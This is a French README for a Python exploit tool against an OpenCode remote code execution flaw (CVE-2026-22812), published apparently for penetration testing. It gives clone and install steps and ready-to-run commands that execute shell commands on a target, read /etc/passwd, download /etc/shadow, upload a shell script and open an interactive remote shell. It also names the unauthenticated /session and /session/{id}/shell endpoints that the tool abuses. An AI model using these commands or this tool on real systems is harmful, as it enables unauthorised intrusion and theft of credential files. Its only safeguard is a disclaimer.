
Outil d'exploitation Python pour OpenCode RCE (CVE-2026-22812) offrant l'exécution de commandes, la lecture/écriture/téléversement/téléchargement de fichiers, ainsi qu'un shell interactif pour les tests d'intrusion autorisés.
Un outil d'exploitation en Python pour la vulnérabilité d'exécution de code à distance (RCE) d'OpenCode affectant les versions < v1.0.216. Cet outil fournit plusieurs vecteurs d'attaque, notamment l'exécution de commandes, la lecture/écriture de fichiers, le téléversement/téléchargement de fichiers et un shell interactif.
⚠️ POUR TESTS AUTORISÉS UNIQUEMENT ⚠️
# Cloner le dépôt
git clone https://github.com/0xgh057r3c0n/CVE-2026-22812.git
cd CVE-2026-22812
# Installer les dépendances
pip install requests urllib3
# Rendre exécutable (optionnel)
chmod +x CVE-2026-22812.py
requestsurllib3python3 CVE-2026-22812.py -t http://cible:port [options]
# Vérifier si la cible est vulnérable
python3 exploit.py -t http://10.0.0.1:4096 --check
# Shell interactif
python3 exploit.py -t http://10.0.0.1:4096 -i
# Exécuter une commande unique
python3 exploit.py -t http://10.0.0.1:4096 -c "id"
# Lire un fichier
python3 exploit.py -t http://10.0.0.1:4096 -r /etc/passwd
# Téléverser un fichier
python3 exploit.py -t http://10.0.0.1:4096 --upload shell.sh /tmp/shell.sh
# Télécharger un fichier
python3 exploit.py -t http://10.0.0.1:4096 --download /etc/shadow shadow.txt
# Obtenir les informations système
python3 exploit.py -t http://10.0.0.1:4096 --info
# Utiliser un proxy (Burp Suite, etc.)
python3 exploit.py -t http://10.0.0.1:4096 -c "whoami" --proxy http://127.0.0.1:8080
Une fois dans le shell interactif (option -i), vous pouvez utiliser :
<commande> Exécuter une commande shell
help Afficher le menu d'aide
exit Quitter le shell
session Afficher l'ID de session
stats Afficher les statistiques d'exploitation
read <fichier> Lire le contenu d'un fichier
download <distant> <local> Télécharger un fichier
upload <local> <distant> Téléverser un fichier
sysinfo Obtenir les informations système
La vulnérabilité existe dans le point de terminaison de gestion de session (/session) qui permet aux utilisateurs non authentifiés de créer des sessions et d'exécuter des commandes arbitraires via le point de terminaison /session/{id}/shell.
POST /session - Créer une sessionPOST /session/{id}/shell - Exécuter des commandesGET /file/content - Lire des fichiersCVE-2026-22812.py
├── Classe Colors (codes de couleur ANSI)
├── print_banner() (Afficher la bannière)
├── Classe Exploit (Logique principale d'exploitation)
│ ├── __init__() (Initialisation)
│ ├── check_vuln() (Vérification de vulnérabilité)
│ ├── create_session() (Créer une session)
│ ├── exec_cmd() (Exécuter une commande)
│ ├── read_file() (Lire un fichier)
│ ├── write_file() (Écrire un fichier)
│ ├── upload() (Téléverser un fichier)
│ ├── download() (Télécharger un fichier)
│ ├── get_info() (Informations système)
│ ├── shell() (Shell interactif)
│ └── Méthodes auxiliaires
└── main() (Analyse des arguments)
Cet outil est publié à des fins éducatives uniquement. Utilisez-le à vos propres risques.
Pour les problèmes et questions, veuillez :